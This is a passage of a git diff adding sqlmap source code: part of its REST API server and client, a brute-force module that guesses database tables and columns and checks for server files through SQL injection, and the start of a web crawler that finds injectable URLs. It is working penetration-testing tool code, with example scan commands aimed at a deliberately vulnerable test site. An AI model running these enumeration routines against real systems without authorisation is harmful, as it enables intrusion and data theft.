% taskid) + return jsonize({"success": False, "message": "Invalid JSON options"}) + + for key in request.json: + if key in RESTAPI_UNSUPPORTED_OPTIONS: + logger.warning("[%s] Unsupported option '%s' provided to scan_start()" % (taskid, key)) + return jsonize({"success": False, "message": "Unsupported option '%s'" % key}) + + # Initialize sqlmap engine's options with user's provided options, if any + for option, value in request.json.items(): + DataStore.tasks[taskid].set_option(option, value) + + # Launch sqlmap engine in a separate process + DataStore.tasks[taskid].engine_start() + + logger.debug("(%s) Started scan" % taskid) + return jsonize({"success": True, "engineid": DataStore.tasks[taskid].engine_get_id()}) + +@get("/scan/<taskid>/stop") +def scan_stop(taskid): + """ + Stop a scan + """ + + if (taskid not in DataStore.tasks or DataStore.tasks[taskid].engine_process() is None or DataStore.tasks[taskid].engine_has_terminated()): + logger.warning("[%s] Invalid task ID provided to scan_stop()" % taskid) + return jsonize({"success": False, "message": "Invalid task ID"}) + + DataStore.tasks[taskid].engine_stop() + + logger.debug("(%s) Stopped scan" % taskid) + return jsonize({"success": True}) + +@get("/scan/<taskid>/kill") +def scan_kill(taskid): + """ + Kill a scan + """ + + if (taskid not in DataStore.tasks or DataStore.tasks[taskid].engine_process() is None or DataStore.tasks[taskid].engine_has_terminated()): + logger.warning("[%s] Invalid task ID provided to scan_kill()" % taskid) + return jsonize({"success": False, "message": "Invalid task ID"}) + + DataStore.tasks[taskid].engine_kill() + + logger.debug("(%s) Killed scan" % taskid) + return jsonize({"success": True}) + +@get("/scan/<taskid>/status") +def scan_status(taskid): + """ + Returns status of a scan + """ + + if taskid not in DataStore.tasks: + logger.warning("[%s] Invalid task ID provided to scan_status()" % taskid) + return jsonize({"success": False, "message": "Invalid task ID"}) + + if DataStore.tasks[taskid].engine_process() is None: + status = "not running" + else: + status = "terminated" if DataStore.tasks[taskid].engine_has_terminated() is True else "running" + + logger.debug("(%s) Retrieved scan status" % taskid) + return jsonize({ + "success": True, + "status": status, + "returncode": DataStore.tasks[taskid].engine_get_returncode() + }) + +@get("/scan/<taskid>/data") +def scan_data(taskid): + """ + Retrieve the data of a scan + """ + + json_data_message = list() + json_errors_message = list() + + if taskid not in DataStore.tasks: + logger.warning("[%s] Invalid task ID provided to scan_data()" % taskid) + return jsonize({"success": False, "message": "Invalid task ID"}) + + # Read all data from the IPC database for the taskid + for status, content_type, value in DataStore.current_db.execute("SELECT status, content_type, value FROM data WHERE taskid = ? ORDER BY id ASC", (taskid,)): + json_data_message.append({"status": status, "type": content_type, "value": dejsonize(value)}) + + # Read all error messages from the IPC database + for error in DataStore.current_db.execute("SELECT error FROM errors WHERE taskid = ? ORDER BY id ASC", (taskid,)): + json_errors_message.append(error) + + logger.debug("(%s) Retrieved scan data and error messages" % taskid) + return jsonize({"success": True, "data": json_data_message, "error": json_errors_message}) + +# Functions to handle scans' logs +@get("/scan/<taskid>/log/<start>/<end>") +def scan_log_limited(taskid, start, end): + """ + Retrieve a subset of log messages + """ + + json_log_messages = list() + + if taskid not in DataStore.tasks: + logger.warning("[%s] Invalid task ID provided to scan_log_limited()" % taskid) + return jsonize({"success": False, "message": "Invalid task ID"}) + + if not start.isdigit() or not end.isdigit() or int(end) < int(start): + logger.warning("[%s] Invalid start or end value provided to scan_log_limited()" % taskid) + return jsonize({"success": False, "message": "Invalid start or end value, must be digits"}) + + start = max(1, int(start)) + end = max(1, int(end)) + + # Read a subset of log messages from the IPC database + for time_, level, message in DataStore.current_db.execute("SELECT time, level, message FROM logs WHERE taskid = ? AND id >= ? AND id <= ? ORDER BY id ASC", (taskid, start, end)): + json_log_messages.append({"time": time_, "level": level, "message": message}) + + logger.debug("(%s) Retrieved scan log messages subset" % taskid) + return jsonize({"success": True, "log": json_log_messages}) + +@get("/scan/<taskid>/log") +def scan_log(taskid): + """ + Retrieve the log messages + """ + + json_log_messages = list() + + if taskid not in DataStore.tasks: + logger.warning("[%s] Invalid task ID provided to scan_log()" % taskid) + return jsonize({"success": False, "message": "Invalid task ID"}) + + # Read all log messages from the IPC database + for time_, level, message in DataStore.current_db.execute("SELECT time, level, message FROM logs WHERE taskid = ? ORDER BY id ASC", (taskid,)): + json_log_messages.append({"time": time_, "level": level, "message": message}) + + logger.debug("(%s) Retrieved scan log messages" % taskid) + return jsonize({"success": True, "log": json_log_messages}) + +# Function to handle files inside the output directory +@get("/download/<taskid>/<target>/<filename:path>") +def download(taskid, target, filename): + """ + Download a certain file from the file system + """ + + if taskid not in DataStore.tasks: + logger.warning("[%s] Invalid task ID provided to download()" % taskid) + return jsonize({"success": False, "message": "Invalid task ID"}) + + path = os.path.abspath(os.path.join(paths.SQLMAP_OUTPUT_PATH, target, filename)) + # Prevent file path traversal + if not path.startswith(paths.SQLMAP_OUTPUT_PATH): + logger.warning("[%s] Forbidden path (%s)" % (taskid, target)) + return jsonize({"success": False, "message": "Forbidden path"}) + + if os.path.isfile(path): + logger.debug("(%s) Retrieved content of file %s" % (taskid, target)) + content = openFile(path, "rb").read() + return jsonize({"success": True, "file": encodeBase64(content, binary=False)}) + else: + logger.warning("[%s] File does not exist %s" % (taskid, target)) + return jsonize({"success": False, "message": "File does not exist"}) + +@get("/version") +def version(token=None): + """ + Fetch server version + """ + + logger.debug("Fetched version (%s)" % ("admin" if is_admin(token) else request.remote_addr)) + return jsonize({"success": True, "version": VERSION_STRING.split('/')[-1]}) + +def server(host=RESTAPI_DEFAULT_ADDRESS, port=RESTAPI_DEFAULT_PORT, adapter=RESTAPI_DEFAULT_ADAPTER, username=None, password=None, database=None): + """ + REST-JSON API server + """ + + DataStore.admin_token = encodeHex(os.urandom(16), binary=False) + DataStore.username = username + DataStore.password = password + + if not database: + _, Database.filepath = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.IPC, text=False) + os.close(_) + else: + Database.filepath = database + + if port == 0: # random + with contextlib.closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s: + s.bind((host, 0)) + port = s.getsockname()[1] + + logger.info("Running REST-JSON API server at '%s:%d'.." % (host, port)) + logger.info("Admin (secret) token: %s" % DataStore.admin_token) + logger.debug("IPC database: '%s'" % Database.filepath) + + # Initialize IPC database + DataStore.current_db = Database() + DataStore.current_db.connect() + DataStore.current_db.init() + + # Run RESTful API + try: + # Supported adapters: aiohttp, auto, bjoern, cgi, cherrypy, diesel, eventlet, fapws3, flup, gae, gevent, geventSocketIO, gunicorn, meinheld, paste, rocket, tornado, twisted, waitress, wsgiref + # Reference: https://bottlepy.org/docs/dev/deployment.html || bottle.server_names + + if adapter == "gevent": + from gevent import monkey + monkey.patch_all() + elif adapter == "eventlet": + import eventlet + eventlet.monkey_patch() + logger.debug("Using adapter '%s' to run bottle" % adapter) + run(host=host, port=port, quiet=True, debug=True, server=adapter) + except socket.error as ex: + if "already in use" in getSafeExString(ex): + logger.error("Address already in use ('%s:%s')" % (host, port)) + else: + raise + except ImportError: + if adapter.lower() not in server_names: + errMsg = "Adapter '%s' is unknown. " % adapter + errMsg += "List of supported adapters: %s" % ', '.join(sorted(list(server_names.keys()))) + else: + errMsg = "Server support for adapter '%s' is not installed on this system " % adapter + errMsg += "(Note: you can try to install it with 'apt install python-%s' or 'pip%s install %s')" % (adapter, '3' if six.PY3 else "", adapter) + logger.critical(errMsg) + +def _client(url, options=None): + logger.debug("Calling '%s'" % url) + try: + headers = {"Content-Type": "application/json"} + + if options is not None: + data = getBytes(jsonize(options)) + else: + data = None + + if DataStore.username or DataStore.password: + headers["Authorization"] = "Basic %s" % encodeBase64("%s:%s" % (DataStore.username or "", DataStore.password or ""), binary=False) + + req = _urllib.request.Request(url, data, headers) + response = _urllib.request.urlopen(req) + text = getText(response.read()) + except: + if options: + logger.error("Failed to load and parse %s" % url) + raise + return text + +def client(host=RESTAPI_DEFAULT_ADDRESS, port=RESTAPI_DEFAULT_PORT, username=None, password=None): + """ + REST-JSON API client + """ + + DataStore.username = username + DataStore.password = password + + dbgMsg = "Example client access from command line:" + dbgMsg += "\n\t$ taskid=$(curl http://%s:%d/task/new 2>1 | grep -o -I '[a-f0-9]\\{16\\}') && echo $taskid" % (host, port) + dbgMsg += "\n\t$ curl -H \"Content-Type: application/json\" -X POST -d '{\"url\": \"http://testphp.vulnweb.com/artists.php?artist=1\"}' http://%s:%d/scan/$taskid/start" % (host, port) + dbgMsg += "\n\t$ curl http://%s:%d/scan/$taskid/data" % (host, port) + dbgMsg += "\n\t$ curl http://%s:%d/scan/$taskid/log" % (host, port) + logger.debug(dbgMsg) + + addr = "http://%s:%d" % (host, port) + logger.info("Starting REST-JSON API client to '%s'..." % addr) + + try: + _client(addr) + except Exception as ex: + if not isinstance(ex, _urllib.error.HTTPError) or ex.code == _http_client.UNAUTHORIZED: + errMsg = "There has been a problem while connecting to the " + errMsg += "REST-JSON API server at '%s' " % addr + errMsg += "(%s)" % getSafeExString(ex) + logger.critical(errMsg) + return + + commands = ("help", "new", "use", "data", "log", "status", "option", "stop", "kill", "list", "flush", "version", "exit", "bye", "quit") + colors = ('red', 'green', 'yellow', 'blue', 'magenta', 'cyan', 'lightgrey', 'lightred', 'lightgreen', 'lightyellow', 'lightblue', 'lightmagenta', 'lightcyan') + autoCompletion(AUTOCOMPLETE_TYPE.API, commands=commands) + + taskid = None + logger.info("Type 'help' or '?' for list of available commands") + + while True: + try: + color = colors[int(taskid or "0", 16) % len(colors)] + command = _input("api%s> " % (" (%s)" % setColor(taskid, color) if taskid else "")).strip() + command = re.sub(r"\A(\w+)", lambda match: match.group(1).lower(), command) + except (EOFError, KeyboardInterrupt): + print() + break + + if command in ("data", "log", "status", "stop", "kill"): + if not taskid: + logger.error("No task ID in use") + continue + raw = _client("%s/scan/%s/%s" % (addr, taskid, command)) + res = dejsonize(raw) + if not res["success"]: + logger.error("Failed to execute command %s" % command) + dataToStdout("%s\n" % raw) + + elif command.startswith("option"): + if not taskid: + logger.error("No task ID in use") + continue + try: + command, option = command.split(" ", 1) + except ValueError: + raw = _client("%s/option/%s/list" % (addr, taskid)) + else: + options = re.split(r"\s*,\s*", option.strip()) + raw = _client("%s/option/%s/get" % (addr, taskid), options) + res = dejsonize(raw) + if not res["success"]: + logger.error("Failed to execute command %s" % command) + dataToStdout("%s\n" % raw) + + elif command.startswith("new"): + if ' ' not in command: + logger.error("Program arguments are missing") + continue + + try: + argv = ["sqlmap.py"] + shlex.split(command)[1:] + except Exception as ex: + logger.error("Error occurred while parsing arguments ('%s')" % getSafeExString(ex)) + taskid = None + continue + + try: + cmdLineOptions = cmdLineParser(argv).__dict__ + except: + taskid = None + continue + + for key in list(cmdLineOptions): + if cmdLineOptions[key] is None: + del cmdLineOptions[key] + + raw = _client("%s/task/new" % addr) + res = dejsonize(raw) + if not res["success"]: + logger.error("Failed to create new task ('%s')" % res.get("message", "")) + continue + taskid = res["taskid"] + logger.info("New task ID is '%s'" % taskid) + + raw = _client("%s/scan/%s/start" % (addr, taskid), cmdLineOptions) + res = dejsonize(raw) + if not res["success"]: + logger.error("Failed to start scan ('%s')" % res.get("message", "")) + continue + logger.info("Scanning started") + + elif command.startswith("use"): + taskid = (command.split()[1] if ' ' in command else "").strip("'\"") + if not taskid: + logger.error("Task ID is missing") + taskid = None + continue + elif not re.search(r"\A[0-9a-fA-F]{16}\Z", taskid): + logger.error("Invalid task ID '%s'" % taskid) + taskid = None + continue + logger.info("Switching to task ID '%s' " % taskid) + + elif command in ("version",): + raw = _client("%s/%s" % (addr, command)) + res = dejsonize(raw) + if not res["success"]: + logger.error("Failed to execute command %s" % command) + dataToStdout("%s\n" % raw) + + elif command in ("list", "flush"): + raw = _client("%s/admin/%s" % (addr, command)) + res = dejsonize(raw) + if not res["success"]: + logger.error("Failed to execute command %s" % command) + elif command == "flush": + taskid = None + dataToStdout("%s\n" % raw) + + elif command in ("exit", "bye", "quit", 'q'): + return + + elif command in ("help", "?"): + msg = "help Show this help message\n" + msg += "new ARGS Start a new scan task with provided arguments (e.g. 'new -u \"http://testphp.vulnweb.com/artists.php?artist=1\"')\n" + msg += "use TASKID Switch current context to different task (e.g. 'use c04d8c5c7582efb4')\n" + msg += "data Retrieve and show data for current task\n" + msg += "log Retrieve and show log for current task\n" + msg += "status Retrieve and show status for current task\n" + msg += "option OPTION Retrieve and show option for current task\n" + msg += "options Retrieve and show all options for current task\n" + msg += "stop Stop current task\n" + msg += "kill Kill current task\n" + msg += "list Display all tasks\n" + msg += "version Fetch server version\n" + msg += "flush Flush tasks (delete all tasks)\n" + msg += "exit Exit this client\n" + + dataToStdout(msg) + + elif command: + logger.error("Unknown command '%s'" % command) diff --git a/src/sqlmap-master/lib/utils/brute.py b/src/sqlmap-master/lib/utils/brute.py new file mode 100644 index 0000000..89577ff --- /dev/null +++ b/src/sqlmap-master/lib/utils/brute.py @@ -0,0 +1,406 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +from __future__ import division + +import time + +from lib.core.common import Backend +from lib.core.common import clearConsoleLine +from lib.core.common import dataToStdout +from lib.core.common import filterListValue +from lib.core.common import getFileItems +from lib.core.common import getPageWordSet +from lib.core.common import hashDBWrite +from lib.core.common import isNoneValue +from lib.core.common import ntToPosixSlashes +from lib.core.common import popValue +from lib.core.common import pushValue +from lib.core.common import randomInt +from lib.core.common import randomStr +from lib.core.common import readInput +from lib.core.common import safeSQLIdentificatorNaming +from lib.core.common import safeStringFormat +from lib.core.common import unArrayizeValue +from lib.core.common import unsafeSQLIdentificatorNaming +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger +from lib.core.decorators import stackedmethod +from lib.core.enums import DBMS +from lib.core.enums import HASHDB_KEYS +from lib.core.enums import PAYLOAD +from lib.core.exception import SqlmapDataException +from lib.core.exception import SqlmapMissingMandatoryOptionException +from lib.core.exception import SqlmapNoneDataException +from lib.core.settings import BRUTE_COLUMN_EXISTS_TEMPLATE +from lib.core.settings import BRUTE_TABLE_EXISTS_TEMPLATE +from lib.core.settings import METADB_SUFFIX +from lib.core.settings import UPPER_CASE_DBMSES +from lib.core.threads import getCurrentThreadData +from lib.core.threads import runThreads +from lib.request import inject + +def _addPageTextWords(): + wordsList = [] + + infoMsg = "adding words used on web page to the check list" + logger.info(infoMsg) + pageWords = getPageWordSet(kb.originalPage) + + for word in pageWords: + word = word.lower() + + if len(word) > 2 and not word[0].isdigit() and word not in wordsList: + wordsList.append(word) + + return wordsList + +@stackedmethod +def tableExists(tableFile, regex=None): + if kb.choices.tableExists is None and not any(_ for _ in kb.injection.data if _ not in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED)) and not conf.direct: + warnMsg = "it's not recommended to use '%s' and/or '%s' " % (PAYLOAD.SQLINJECTION[PAYLOAD.TECHNIQUE.TIME], PAYLOAD.SQLINJECTION[PAYLOAD.TECHNIQUE.STACKED]) + warnMsg += "for common table existence check" + logger.warning(warnMsg) + + message = "are you sure you want to continue? [y/N] " + kb.choices.tableExists = readInput(message, default='N', boolean=True) + + if not kb.choices.tableExists: + return None + + result = inject.checkBooleanExpression("%s" % safeStringFormat(BRUTE_TABLE_EXISTS_TEMPLATE, (randomInt(1), randomStr()))) + + if result: + errMsg = "can't use table existence check because of detected invalid results " + errMsg += "(most likely caused by inability of the used injection " + errMsg += "to distinguish erroneous results)" + raise SqlmapDataException(errMsg) + + pushValue(conf.db) + + if conf.db and Backend.getIdentifiedDbms() in UPPER_CASE_DBMSES: + conf.db = conf.db.upper() + + message = "which common tables (wordlist) file do you want to use?\n" + message += "[1] default '%s' (press Enter)\n" % tableFile + message += "[2] custom" + choice = readInput(message, default='1') + + if choice == '2': + message = "what's the custom common tables file location?\n" + tableFile = readInput(message) or tableFile + + infoMsg = "performing table existence using items from '%s'" % tableFile + logger.info(infoMsg) + + tables = getFileItems(tableFile, lowercase=Backend.getIdentifiedDbms() in (DBMS.ACCESS,), unique=True) + tables.extend(_addPageTextWords()) + tables = filterListValue(tables, regex) + + for conf.db in (conf.db.split(',') if conf.db else [conf.db]): + if conf.db and METADB_SUFFIX not in conf.db: + infoMsg = "checking database '%s'" % conf.db + logger.info(infoMsg) + + threadData = getCurrentThreadData() + threadData.shared.count = 0 + threadData.shared.limit = len(tables) + threadData.shared.files = [] + threadData.shared.unique = set() + + def tableExistsThread(): + threadData = getCurrentThreadData() + + while kb.threadContinue: + kb.locks.count.acquire() + if threadData.shared.count < threadData.shared.limit: + table = safeSQLIdentificatorNaming(tables[threadData.shared.count], True) + threadData.shared.count += 1 + kb.locks.count.release() + else: + kb.locks.count.release() + break + + if conf.db and METADB_SUFFIX not in conf.db and Backend.getIdentifiedDbms() not in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD): + fullTableName = "%s.%s" % (conf.db, table) + else: + fullTableName = table + + if Backend.isDbms(DBMS.MCKOI): + _ = randomInt(1) + result = inject.checkBooleanExpression("%s" % safeStringFormat("%d=(SELECT %d FROM %s)", (_, _, fullTableName))) + else: + result = inject.checkBooleanExpression("%s" % safeStringFormat(BRUTE_TABLE_EXISTS_TEMPLATE, (randomInt(1), fullTableName))) + + kb.locks.io.acquire() + + if result and table.lower() not in threadData.shared.unique: + threadData.shared.files.append(table) + threadData.shared.unique.add(table.lower()) + + if conf.verbose in (1, 2) and not conf.api: + clearConsoleLine(True) + infoMsg = "[%s] [INFO] retrieved: %s\n" % (time.strftime("%X"), unsafeSQLIdentificatorNaming(table)) + dataToStdout(infoMsg, True) + + if conf.verbose in (1, 2): + status = '%d/%d items (%d%%)' % (threadData.shared.count, threadData.shared.limit, round(100.0 * threadData.shared.count / threadData.shared.limit)) + dataToStdout("\r[%s] [INFO] tried %s" % (time.strftime("%X"), status), True) + + kb.locks.io.release() + + try: + runThreads(conf.threads, tableExistsThread, threadChoice=True) + except KeyboardInterrupt: + warnMsg = "user aborted during table existence " + warnMsg += "check. sqlmap will display partial output" + logger.warning(warnMsg) + + clearConsoleLine(True) + dataToStdout("\n") + + if not threadData.shared.files: + warnMsg = "no table(s) found" + if conf.db: + warnMsg += " for database '%s'" % conf.db + logger.warning(warnMsg) + else: + for item in threadData.shared.files: + if conf.db not in kb.data.cachedTables: + kb.data.cachedTables[conf.db] = [item] + else: + kb.data.cachedTables[conf.db].append(item) + + for _ in ((conf.db, item) for item in threadData.shared.files): + if _ not in kb.brute.tables: + kb.brute.tables.append(_) + + conf.db = popValue() + hashDBWrite(HASHDB_KEYS.KB_BRUTE_TABLES, kb.brute.tables, True) + + return kb.data.cachedTables + +def columnExists(columnFile, regex=None): + if kb.choices.columnExists is None and not any(_ for _ in kb.injection.data if _ not in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED)) and not conf.direct: + warnMsg = "it's not recommended to use '%s' and/or '%s' " % (PAYLOAD.SQLINJECTION[PAYLOAD.TECHNIQUE.TIME], PAYLOAD.SQLINJECTION[PAYLOAD.TECHNIQUE.STACKED]) + warnMsg += "for common column existence check" + logger.warning(warnMsg) + + message = "are you sure you want to continue? [y/N] " + kb.choices.columnExists = readInput(message, default='N', boolean=True) + + if not kb.choices.columnExists: + return None + + if not conf.tbl: + errMsg = "missing table parameter" + raise SqlmapMissingMandatoryOptionException(errMsg) + + if conf.db and Backend.getIdentifiedDbms() in UPPER_CASE_DBMSES: + conf.db = conf.db.upper() + + result = inject.checkBooleanExpression(safeStringFormat(BRUTE_COLUMN_EXISTS_TEMPLATE, (randomStr(), randomStr()))) + + if result: + errMsg = "can't use column existence check because of detected invalid results " + errMsg += "(most likely caused by inability of the used injection " + errMsg += "to distinguish erroneous results)" + raise SqlmapDataException(errMsg) + + message = "which common columns (wordlist) file do you want to use?\n" + message += "[1] default '%s' (press Enter)\n" % columnFile + message += "[2] custom" + choice = readInput(message, default='1') + + if choice == '2': + message = "what's the custom common columns file location?\n" + columnFile = readInput(message) or columnFile + + infoMsg = "checking column existence using items from '%s'" % columnFile + logger.info(infoMsg) + + columns = getFileItems(columnFile, unique=True) + columns.extend(_addPageTextWords()) + columns = filterListValue(columns, regex) + + table = safeSQLIdentificatorNaming(conf.tbl, True) + + if conf.db and METADB_SUFFIX not in conf.db and Backend.getIdentifiedDbms() not in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD): + table = "%s.%s" % (safeSQLIdentificatorNaming(conf.db), table) + + kb.threadContinue = True + kb.bruteMode = True + + threadData = getCurrentThreadData() + threadData.shared.count = 0 + threadData.shared.limit = len(columns) + threadData.shared.files = [] + + def columnExistsThread(): + threadData = getCurrentThreadData() + + while kb.threadContinue: + kb.locks.count.acquire() + if threadData.shared.count < threadData.shared.limit: + column = safeSQLIdentificatorNaming(columns[threadData.shared.count]) + threadData.shared.count += 1 + kb.locks.count.release() + else: + kb.locks.count.release() + break + + if Backend.isDbms(DBMS.MCKOI): + result = inject.checkBooleanExpression(safeStringFormat("0<(SELECT COUNT(%s) FROM %s)", (column, table))) + else: + result = inject.checkBooleanExpression(safeStringFormat(BRUTE_COLUMN_EXISTS_TEMPLATE, (column, table))) + + kb.locks.io.acquire() + + if result: + threadData.shared.files.append(column) + + if conf.verbose in (1, 2) and not conf.api: + clearConsoleLine(True) + infoMsg = "[%s] [INFO] retrieved: %s\n" % (time.strftime("%X"), unsafeSQLIdentificatorNaming(column)) + dataToStdout(infoMsg, True) + + if conf.verbose in (1, 2): + status = "%d/%d items (%d%%)" % (threadData.shared.count, threadData.shared.limit, round(100.0 * threadData.shared.count / threadData.shared.limit)) + dataToStdout("\r[%s] [INFO] tried %s" % (time.strftime("%X"), status), True) + + kb.locks.io.release() + + try: + runThreads(conf.threads, columnExistsThread, threadChoice=True) + except KeyboardInterrupt: + warnMsg = "user aborted during column existence " + warnMsg += "check. sqlmap will display partial output" + logger.warning(warnMsg) + finally: + kb.bruteMode = False + + clearConsoleLine(True) + dataToStdout("\n") + + if not threadData.shared.files: + warnMsg = "no column(s) found" + logger.warning(warnMsg) + else: + columns = {} + + for column in threadData.shared.files: + if Backend.getIdentifiedDbms() in (DBMS.MYSQL,): + result = not inject.checkBooleanExpression("%s" % safeStringFormat("EXISTS(SELECT %s FROM %s WHERE %s REGEXP '[^0-9]')", (column, table, column))) + elif Backend.getIdentifiedDbms() in (DBMS.SQLITE,): + result = inject.checkBooleanExpression("%s" % safeStringFormat("EXISTS(SELECT %s FROM %s WHERE %s NOT GLOB '*[^0-9]*')", (column, table, column))) + elif Backend.getIdentifiedDbms() in (DBMS.MCKOI,): + result = inject.checkBooleanExpression("%s" % safeStringFormat("0=(SELECT MAX(%s)-MAX(%s) FROM %s)", (column, column, table))) + else: + result = inject.checkBooleanExpression("%s" % safeStringFormat("EXISTS(SELECT %s FROM %s WHERE ROUND(%s)=ROUND(%s))", (column, table, column, column))) + + if result: + columns[column] = "numeric" + else: + columns[column] = "non-numeric" + + kb.data.cachedColumns[conf.db] = {conf.tbl: columns} + + for _ in ((conf.db, conf.tbl, item[0], item[1]) for item in columns.items()): + if _ not in kb.brute.columns: + kb.brute.columns.append(_) + + hashDBWrite(HASHDB_KEYS.KB_BRUTE_COLUMNS, kb.brute.columns, True) + + return kb.data.cachedColumns + +@stackedmethod +def fileExists(pathFile): + retVal = [] + + message = "which common files file do you want to use?\n" + message += "[1] default '%s' (press Enter)\n" % pathFile + message += "[2] custom" + choice = readInput(message, default='1') + + if choice == '2': + message = "what's the custom common files file location?\n" + pathFile = readInput(message) or pathFile + + infoMsg = "checking files existence using items from '%s'" % pathFile + logger.info(infoMsg) + + paths = getFileItems(pathFile, unique=True) + + kb.bruteMode = True + + try: + conf.dbmsHandler.readFile(randomStr()) + except SqlmapNoneDataException: + pass + except: + kb.bruteMode = False + raise + + threadData = getCurrentThreadData() + threadData.shared.count = 0 + threadData.shared.limit = len(paths) + threadData.shared.files = [] + + def fileExistsThread(): + threadData = getCurrentThreadData() + + while kb.threadContinue: + kb.locks.count.acquire() + if threadData.shared.count < threadData.shared.limit: + path = ntToPosixSlashes(paths[threadData.shared.count]) + threadData.shared.count += 1 + kb.locks.count.release() + else: + kb.locks.count.release() + break + + try: + result = unArrayizeValue(conf.dbmsHandler.readFile(path)) + except SqlmapNoneDataException: + result = None + + kb.locks.io.acquire() + + if not isNoneValue(result): + threadData.shared.files.append(result) + + if not conf.api: + clearConsoleLine(True) + infoMsg = "[%s] [INFO] retrieved: '%s'\n" % (time.strftime("%X"), path) + dataToStdout(infoMsg, True) + + if conf.verbose in (1, 2): + status = '%d/%d items (%d%%)' % (threadData.shared.count, threadData.shared.limit, round(100.0 * threadData.shared.count / threadData.shared.limit)) + dataToStdout("\r[%s] [INFO] tried %s" % (time.strftime("%X"), status), True) + + kb.locks.io.release() + + try: + runThreads(conf.threads, fileExistsThread, threadChoice=True) + except KeyboardInterrupt: + warnMsg = "user aborted during file existence " + warnMsg += "check. sqlmap will display partial output" + logger.warning(warnMsg) + finally: + kb.bruteMode = False + + clearConsoleLine(True) + dataToStdout("\n") + + if not threadData.shared.files: + warnMsg = "no file(s) found" + logger.warning(warnMsg) + else: + retVal = threadData.shared.files + + return retVal diff --git a/src/sqlmap-master/lib/utils/crawler.py b/src/sqlmap-master/lib/utils/crawler.py new file mode 100644 index 0000000..43b24a2 --- /dev/null +++ b/src/sqlmap-master/lib/utils/crawler.py @@ -0,0 +1,265 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +from __future__ import division + +import os +import re +import tempfile +import time + +from lib.core.common import checkSameHost +from lib.core.common import clearConsoleLine +from lib.core.common import dataToStdout +from lib.core.common import extractRegexResult +from lib.core.common import findPageForms +from lib.core.common import getSafeExString +from lib.core.common import openFile +from lib.core.common import readInput +from lib.core.common import safeCSValue +from lib.core.common import urldecode +from lib.core.compat import xrange +from lib.core.convert import htmlUnescape +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger +from lib.core.datatype import OrderedSet +from lib.core.enums import MKSTEMP_PREFIX +from lib.core.exception import SqlmapConnectionException +from lib.core.exception import SqlmapSyntaxException +from lib.core.settings import CRAWL_EXCLUDE_EXTENSIONS +from lib.core.threads import getCurrentThreadData +from lib.core.threads import runThreads +from lib.parse.sitemap import parseSitemap +from lib.request.connect import Connect as Request +from thirdparty import six +from thirdparty.beautifulsoup.beautifulsoup import BeautifulSoup +from thirdparty.six.moves import http_client as _http_client +from thirdparty.six.moves import urllib as _urllib + +def crawl(target, post=None, cookie=None): + if not target: + return + + try: + visited = set() + threadData = getCurrentThreadData() + threadData.shared.value = OrderedSet() + threadData.shared.formsFound = False + + def crawlThread(): + threadData = getCurrentThreadData() + + while kb.threadContinue: + with kb.locks.limit: + if threadData.shared.unprocessed: + current = threadData.shared.unprocessed.pop() + if current in visited: + continue + elif conf.crawlExclude and re.search(conf.crawlExclude, current): + dbgMsg = "skipping '%s'" % current + logger.debug(dbgMsg) + continue + else: + visited.add(current) + else: + break + + content = None + try: + if current: + content = Request.getPage(url=current, post=post, cookie=None, crawling=True, raise404=False)[0] + except SqlmapConnectionException as ex: + errMsg = "connection exception detected ('%s'). skipping " % getSafeExString(ex) + errMsg += "URL '%s'" % current + logger.critical(errMsg) + except SqlmapSyntaxException: + errMsg = "invalid URL detected. skipping '%s'" % current + logger.critical(errMsg) + except _http_client.InvalidURL as ex: + errMsg = "invalid URL detected ('%s'). skipping " % getSafeExString(ex) + errMsg += "URL '%s'" % current + logger.critical(errMsg) + + if not kb.threadContinue: + break + + if isinstance(content, six.text_type): + try: + match = re.search(r"(?si)<html[^>]*>(.+)</html>", content) + if match: + content = "<html>%s</html>" % match.group(1) + + soup = BeautifulSoup(content) + tags = soup('a') + + tags += re.finditer(r'(?i)\s(href|src)=["\'](?P<href>[^>"\']+)', content) + tags += re.finditer(r'(?i)window\.open\(["\'](?P<href>[^)"\']+)["\']', content) + + for tag in tags: + href = tag.get("href") if hasattr(tag, "get") else tag.group("href") + + if href: + if threadData.lastRedirectURL and threadData.lastRedirectURL[0] == threadData.lastRequestUID: + current = threadData.lastRedirectURL[1] + url = _urllib.parse.urljoin(current, htmlUnescape(href)) + + # flag to know if we are dealing with the same target host + _ = checkSameHost(url, target) + + if conf.scope: + if not re.search(conf.scope, url, re.I): + continue + elif not _: + continue + + if (extractRegexResult(r"\A[^?]+\.(?P<result>\w+)(\?|\Z)", url) or "").lower() not in CRAWL_EXCLUDE_EXTENSIONS: + with kb.locks.value: + threadData.shared.deeper.add(url) + if re.search(r"(.*?)\?(.+)", url) and not re.search(r"\?(v=)?\d+\Z", url) and not re.search(r"(?i)\.(js|css)(\?|\Z)", url): + threadData.shared.value.add(url) + except UnicodeEncodeError: # for non-HTML files + pass + except ValueError: # for non-valid links + pass + except AssertionError: # for invalid HTML + pass + finally: + if conf.forms: + threadData.shared.formsFound |= len(findPageForms(content, current, False, True)) > 0 + + if conf.verbose in (1, 2): + threadData.shared.count += 1 + status = '%d/%d links visited (%d%%)' % (threadData.shared.count, threadData.shared.length, round(100.0 * threadData.shared.count / threadData.shared.length)) + dataToStdout("\r[%s] [INFO] %s" % (time.strftime("%X"), status), True) + + threadData.shared.deeper = set() + threadData.shared.unprocessed = set([target]) + + _ = re.sub(r"(?<!/)/(?!/).*", "", target) + if _: + if target.strip('/') != _.strip('/'): + threadData.shared.unprocessed.add(_) + + if re.search(r"\?.*\b\w+=", target): + threadData.shared.value.add(target) + + if kb.checkSitemap is None: + message = "do you want to check for the existence of " + message += "site's sitemap(.xml) [y/N] " + kb.checkSitemap = readInput(message, default='N', boolean=True) + + if kb.checkSitemap: + found = True + items = None + url = _urllib.parse.urljoin(target, "/sitemap.xml") + try: + items = parseSitemap(url) + except SqlmapConnectionException as ex: + if "page not found" in getSafeExString(ex): + 